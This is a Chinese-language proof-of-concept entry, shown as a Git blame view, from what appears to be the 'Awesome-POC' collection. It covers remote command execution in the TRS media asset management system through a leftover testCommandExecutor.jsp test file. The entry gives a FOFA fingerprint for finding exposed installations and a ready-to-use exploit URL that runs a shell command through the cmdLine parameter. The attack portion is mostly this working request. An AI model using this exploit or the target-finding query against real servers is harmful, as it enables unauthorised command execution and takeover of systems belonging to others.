Awesome-POC/Web应用漏洞/拓尔思 TRS testCommandExecutor.jsp 远程命令执行漏洞.md

31 lines
654 B
Markdown
Raw Normal View History

2023-06-11 21:15:01 +08:00
# 拓尔思 TRS testCommandExecutor.jsp 远程命令执行漏洞
2023-03-14 09:11:27 +08:00
## 漏洞描述
2023-06-11 21:15:01 +08:00
拓尔思 TRS testCommandExecutor.jsp测试文件存在远程命令执行漏洞当网站运维者未删除测试文件时攻击者通过漏洞可以获取服务器权限
2023-03-14 09:11:27 +08:00
## 漏洞影响
```
2023-06-11 21:15:01 +08:00
拓尔思-TRS
2023-03-14 09:11:27 +08:00
```
## FOFA
```
2023-06-11 21:15:01 +08:00
"TRS媒资管理系统登录页面"
2023-03-14 09:11:27 +08:00
```
## 漏洞复现
主页面
![image-20230314084307993](images/image-20230314084307993.png)
验证POC
```
/mas/front/vod/main.do?method=newList&view=forward:/sysinfo/testCommandExecutor.jsp&cmdLine=dir&workDir=&pathEnv=&libPathEnv=
```
![image-20230314084331676](images/image-20230314084331676.png)